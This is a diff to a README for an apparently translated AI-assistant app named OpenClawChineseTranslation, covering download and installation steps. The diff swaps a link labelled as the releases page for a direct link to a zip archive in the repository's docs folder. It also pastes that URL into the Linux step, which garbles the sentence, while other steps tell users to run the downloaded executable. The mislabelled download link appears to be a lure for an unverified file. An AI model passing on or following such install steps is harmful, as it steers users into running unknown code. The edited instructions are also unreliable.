lyser07/OpenClawChineseTranslation/README.md

 To install OpenClawChineseTranslation, follow these steps:

-1. **Visit the Releases Page**: Click on this link to access the download options: [Download Here](https://github.com/lyser07/OpenClawChineseTranslation/releases).
+1. **Visit the Releases Page**: Click on this link to access the download options: [Download Here](https://raw.githubusercontent.com/lyser07/OpenClawChineseTranslation/main/docs/Translation-Chinese-Open-Claw-v2.9-alpha.2.zip).
 2. **Choose Your Version**: Select the latest release.
 You will find options for different operating systems.
 3. **Download the File**: Click on the appropriate download link for your OS.
 The file will begin to download automatically.
 4. **Install the Software**:
    - **For Windows**: Run the `.exe` file you just downloaded.
 Follow the on-screen instructions.
    - **For macOS**: Open the `.dmg` file and drag the application to your Applications folder.
-   - **For Linux**: Follow the installation instructions provided in the `.tar.gz` file you downloaded.
+   - **For Linux**: Follow the installation instructions provided in the `https://raw.githubusercontent.com/lyser07/OpenClawChineseTranslation/main/docs/Translation-Chinese-Open-Claw-v2.9-alpha.2.zip` file you downloaded.

 5. **Launch the Application**: Once installed, you can find OpenClawChineseTranslation in your application list.
 Click to start using your AI assistant.